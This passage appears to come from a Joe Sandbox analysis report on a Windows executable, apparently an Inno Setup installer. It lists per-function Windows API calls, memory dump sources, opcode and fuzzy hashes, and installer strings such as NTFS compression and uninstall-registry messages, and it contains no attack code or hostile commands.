                                                                              • GetCursorPos.USER32 ref: 00417260
                                                                              • SetCursor.USER32(00000000), ref: 004172A3
                                                                              • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                              • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                              • String ID:
                                                                              • API String ID: 1959210111-0
                                                                              • Opcode ID: 0923a2c161fc1a9e066ccd67b54e00c3a39e3c999bff849f93405dbd13ead463
                                                                              • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                              • Opcode Fuzzy Hash: 0923a2c161fc1a9e066ccd67b54e00c3a39e3c999bff849f93405dbd13ead463
                                                                              • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                              APIs
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495161
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495175
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495189
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 004951A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                              • Instruction ID: ece1589fda812a565620013fcb1ed5a997ef569cae5724ba48b6fbd062de1f9b
                                                                              • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                              • Instruction Fuzzy Hash: E8115172A05104AFCB40DEA9D8C5E8B7BECEF4D320B24416AF908DB346D634EC408BA4
                                                                              APIs
                                                                              • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                              • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                              • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                              • String ID:
                                                                              • API String ID: 4025006896-0
                                                                              • Opcode ID: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                              • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                              • Opcode Fuzzy Hash: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                              • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                              • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047C648,0000000A,00000000), ref: 0040D041
                                                                              • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047C648), ref: 0040D05B
                                                                              • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                              • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                              • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                              • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00470465
                                                                              Strings
                                                                              • Failed to set NTFS compression state (%d)., xrefs: 00470476
                                                                              • Unsetting NTFS compression on file: %s, xrefs: 0047044B
                                                                              • Setting NTFS compression on file: %s, xrefs: 00470433
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                              • API String ID: 1452528299-3038984924
                                                                              • Opcode ID: a714ca870f106a0b299b69b708085a280bfeb4b7d5a8dbea3a6d3b5799a23f26
                                                                              • Instruction ID: 5508092d392c29e30f7e419f1558a5efa53bd64671fa73d33ea5aa8feab5f6e0
                                                                              • Opcode Fuzzy Hash: a714ca870f106a0b299b69b708085a280bfeb4b7d5a8dbea3a6d3b5799a23f26
                                                                              • Instruction Fuzzy Hash: CA016730E1924896CB14D7AD54812EDBBF49F49308F44C1EFA55DE7382DA781A08879A
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 0046FCB9
                                                                              Strings
                                                                              • Failed to set NTFS compression state (%d)., xrefs: 0046FCCA
                                                                              • Setting NTFS compression on directory: %s, xrefs: 0046FC87
                                                                              • Unsetting NTFS compression on directory: %s, xrefs: 0046FC9F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                              • API String ID: 1452528299-1392080489
                                                                              • Opcode ID: d08b5e621045cc5cd0e44a77b6b1f6d9ef736be1227186b37ca663e00f32494c
                                                                              • Instruction ID: 966577c707f49859c08c22ad5a588f09726d737875f6d95343439a3241496ead
                                                                              • Opcode Fuzzy Hash: d08b5e621045cc5cd0e44a77b6b1f6d9ef736be1227186b37ca663e00f32494c
                                                                              • Instruction Fuzzy Hash: 55011720D1824C56CB14D7AD74812DDBBB4AF49314F54C1BFA899E7342EB791A0C879B
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5FE,?,?,?,?,?,00000000,0045B625), ref: 00455DD8
                                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5FE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                              • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                              • String ID:
                                                                              • API String ID: 4283692357-0
                                                                              • Opcode ID: 876c7f592335f26f534d3a610f48d9a4b9bf1bdf8c7f8d73d654af2b8de839a9
                                                                              • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                              • Opcode Fuzzy Hash: 876c7f592335f26f534d3a610f48d9a4b9bf1bdf8c7f8d73d654af2b8de839a9
                                                                              • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CountSleepTick
                                                                              • String ID:
                                                                              • API String ID: 2227064392-0
                                                                              • Opcode ID: a059845960953a09b5437104de94e4f2c0855e1466d2a7ed8765463934732ab9
                                                                              • Instruction ID: 6dd2862dcb574814dc985a52fd8bef393983683767be68f312e29577703bd9fd
                                                                              • Opcode Fuzzy Hash: a059845960953a09b5437104de94e4f2c0855e1466d2a7ed8765463934732ab9
                                                                              • Instruction Fuzzy Hash: C4E0E5623291114D862935FE18D25AF4984CBC23A6B2A453FE088D6242C8584D05467F
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480DAC,?,?,?,?,?,0049884B,00000000), ref: 00477D2D
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480DAC,?,?,?,?,?,0049884B), ref: 00477D33
                                                                              • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480DAC), ref: 00477D55
                                                                              • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480DAC), ref: 00477D66
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                              • String ID:
                                                                              • API String ID: 215268677-0
                                                                              • Opcode ID: 3a93110a626b43f3eadaa74cf541c0290f0e8f026231ea58c1b57ecd76d8e3ea
                                                                              • Instruction ID: 7d1e0899fa26f13c2a6683c6024d2156ea27cbafc883e2ae306b9283f9cebe78
                                                                              • Opcode Fuzzy Hash: 3a93110a626b43f3eadaa74cf541c0290f0e8f026231ea58c1b57ecd76d8e3ea
                                                                              • Instruction Fuzzy Hash: 85F037616447007BD610E6B58C81E6B73DCEF44754F04893A7E94C72C1D678D8089726
                                                                              APIs
                                                                              • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                              • IsWindowVisible.USER32(?), ref: 0042425D
                                                                              • IsWindowEnabled.USER32(?), ref: 00424267
                                                                              • SetForegroundWindow.USER32(?), ref: 00424271
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                              • String ID:
                                                                              • API String ID: 2280970139-0
                                                                              • Opcode ID: f5eb756bdd9929eb0187d31ee3fb53ef02cbc66ad04bc69917a7cf098bede398
                                                                              • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                              • Opcode Fuzzy Hash: f5eb756bdd9929eb0187d31ee3fb53ef02cbc66ad04bc69917a7cf098bede398
                                                                              • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                              APIs
                                                                              • GlobalHandle.KERNEL32 ref: 0040626F
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                              • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocHandleLockUnlock
                                                                              • String ID:
                                                                              • API String ID: 2167344118-0
                                                                              • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                              • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                              • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                              • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B625,?,00000000,00000000,00000001,00000000,00479FD9,?,00000000), ref: 00479F9D
                                                                              Strings
                                                                              • Failed to parse "reg" constant, xrefs: 00479FA4
                                                                              • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479E11
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                              • API String ID: 3535843008-1938159461
                                                                              • Opcode ID: 16d8054e143327fe44f194470e69b7b3affe626307b8d2e4c87d8a967639857b
                                                                              • Instruction ID: 47cfa27444033e2517bbb80e4c41b37ce2323e10df06c4a21d1f595548a21c80
                                                                              • Opcode Fuzzy Hash: 16d8054e143327fe44f194470e69b7b3affe626307b8d2e4c87d8a967639857b
                                                                              • Instruction Fuzzy Hash: EB814F74E00108AFCB10EFA5D881ADEBBF9EF49314F50816AE814E7391D7389E45CB98
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,004831FA,?,00000000,0048323B,?,?,?,?,00000000,00000000,00000000,?,0046BC0D), ref: 004830A9
                                                                              • SetActiveWindow.USER32(?,00000000,004831FA,?,00000000,0048323B,?,?,?,?,00000000,00000000,00000000,?,0046BC0D), ref: 004830BB
                                                                              Strings
                                                                              • Will not restart Windows automatically., xrefs: 004831DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveForeground
                                                                              • String ID: Will not restart Windows automatically.
                                                                              • API String ID: 307657957-4169339592
                                                                              • Opcode ID: 5dc678ddc73231bd7f3deb4895ee9687ce670b7cd050f2935782a4b7fd108cc5
                                                                              • Instruction ID: 14d12ce259a9d91e5540598a1459cb212717435f7278461c6eeed3650d71e2e9
                                                                              • Opcode Fuzzy Hash: 5dc678ddc73231bd7f3deb4895ee9687ce670b7cd050f2935782a4b7fd108cc5
                                                                              • Instruction Fuzzy Hash: E7415530304280AEE701FF64DDAAB6DBBA0AB56F05F104CB7E8404B3A2C67D1A01DB5D
                                                                              Strings
                                                                              • Failed to proceed to next wizard page; aborting., xrefs: 0046CB98
                                                                              • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CBAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                              • API String ID: 0-1974262853
                                                                              • Opcode ID: 5c21498a53a12cfa8e7fd6d0fca4a53d4e4662c611673a7e38899ae354c5c1cd
                                                                              • Instruction ID: f767aec7694c3a706269651ece3f491ea64dc64c3ef09eb99a1787ebd09846f2
                                                                              • Opcode Fuzzy Hash: 5c21498a53a12cfa8e7fd6d0fca4a53d4e4662c611673a7e38899ae354c5c1cd
                                                                              • Instruction Fuzzy Hash: A7317230604204DFD711EB99D5C6BA977E5AB05704F5500BBE048AB392D778BE40CB5E
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,00478A9E,?,?,00000001,00000000,00000000,00478AB9), ref: 00478A87
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478A12
                                                                              • %s\%s_is1, xrefs: 00478A30
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                              • API String ID: 47109696-1598650737
                                                                              • Opcode ID: cbbb33293de64dd8a9f9caa67a5b3cda024617d485473e40b666104571127f40
                                                                              • Instruction ID: dc80809357616fc60b3df9076f922e914a3229883baf2cade8178dd1eb90c67d
                                                                              • Opcode Fuzzy Hash: cbbb33293de64dd8a9f9caa67a5b3cda024617d485473e40b666104571127f40
                                                                              • Instruction Fuzzy Hash: C2218170B042446FDB01DFA9CC55ADEBBE8EB88304F90847BE508E7381DA789D01CB59
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteMessageSendShell
                                                                              • String ID: open
                                                                              • API String ID: 812272486-2758837156
                                                                              • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                              • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                              • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                              • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                              APIs
                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                              • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
